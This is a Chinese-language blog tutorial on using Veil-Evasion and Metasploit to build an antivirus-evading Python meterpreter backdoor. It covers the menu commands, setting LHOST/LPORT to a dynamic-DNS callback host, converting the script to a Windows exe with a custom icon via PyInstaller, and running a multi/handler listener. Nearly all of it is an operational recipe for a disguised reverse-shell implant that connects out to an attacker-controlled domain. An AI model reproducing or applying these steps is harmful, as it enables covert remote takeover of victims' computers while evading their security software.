您的位置:首页 > 编程语言 > ASP

使用veil-evasion+metasploit生成基于python的后门软件

2016-04-27 14:35 776 查看
Veil Evasion是一个可执行文件,它被用来生成Metasploit的payload,能绕过常见杀软。

Veil-Evasion被原生设计为在kali上,但其实存在python环境的系统上应该都能运行。你可以用命令行轻松调用Veil-Evasion,按菜单选项生成payload。在创建payload的时候,Veil-Evasion会询问你是否想把payload文件用Pyinstaller或者Py2Exe转为可执行文件。

1、安装

veil-evasion,kalilinux可以直接 apt-get install veil-evasion,或者直接到官网下载:https://github.com/Veil-Framework/Veil

2、使用



使用use、list可以列出当前可用的模块



如果要使用某个模块可以直接输入 use + 模块的名称,例如 use python/meterpreter/rev_tcp,或者是直接 use + 模块前面的序号。

使用模块和metasploit的模块 使用很相似

options—列出当前可以设置的选项

set LHOST,set LPORT,设置相关的端口号和ip(ip也可以是域名,方便外网上线)

generate—当ip和端口都设置好了之后就可以生成payload

生成成功后会显示如下内容:

可以到/var/lib/veil-evasion/output/source/这个文件夹下找到生成的python后门脚本。

Language:      python
Payload:       python/meterpreter/rev_tcp
Required Options:      ARCHITECTURE=32  COMPILE_TO_EXE=N
EXPIRE_PAYLOAD=X  LHOST=innovationzkj.imwork.net
LPORT=14603  USE_PYHERION=N
Payload File:      /var/lib/veil-evasion/output/source/fuck1.py
Handler File:      /var/lib/veil-evasion/output/handlers/fuck1_handler.rc


这个过程实际上是生成了一个python脚本,我们可以通过pyinstaller将其转化问exe文件

下面简单讲一下将python脚本生成为exe文件的过程

pyinstaller安装:

1,下载pyinstaller并解压(可以去官网下载最新版):

http://nchc.dl.sourceforge.net/project/pyinstaller/2.0/pyinstaller-2.0.zip

2,安装最新版本的 pywin32-217.win32-py2.7.exe:

http://download.csdn.net/detail/gfsfg8545/6539111

不然会出现错误Error: PyInstaller for Python 2.6+ on Windows needs pywin32.

具体安装过程可以参考这篇博文:

/article/9844986.html

一般的命令:(cmd进入到pyinstaller的文件夹)

python pyinstaller.py -w –onefile xxx.py(你想转换的py脚本)

python pyinstaller.py -w –onefile –icon=”my.ico” xxx.py

关于图标的设置问题:应该准备四张不同尺寸(具体尺寸参见http://stackoverflow.com/questions/3236115/which-icon-sizes-should-my-windows-applications-icon-include)的png文件,然后用png2icon(下载)脚本把它们合成一张icon图标文件

3、msf的设置以及veil-evasion的设置:

这里分两种情况:

1、内网连接后门

内网比较简单, veil-evasion里选定模之后,可以指定LHOST就是你的计算机在内网的ip,然后受控端也在内网,可以直接到/var/lib/veil-evasion/output/handlers/这个目录下找到相应的msf脚本,然后执行msfconsole -r “veil生成的msf脚本文件”,然后等待目标运行后门就可以了。

2、外网链接后门

这个就需要进行端口映射,我这里使用了花生壳作为外网端口映射的工具,花生壳的具体操作过程不再赘述。

veil-evasion生成payload的时候,LHOST要设置成你在花生壳上申请的域名(也可以设置从域名指向的ip),LPORT要设置成花生壳分配的那个端口号

花生壳设置的时候,外网域名指向你本机内网的ip地址,和你自己设定的映射端口号。

msf监听:

1、开启msf

2、use exploit/multi/handler

3、set PAYLOAD windows/meterpreter/reverse_tcp

4、- set LHOST 你本机内网的ip地 ,set LPORT 你本地监听的端口

5、explit
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: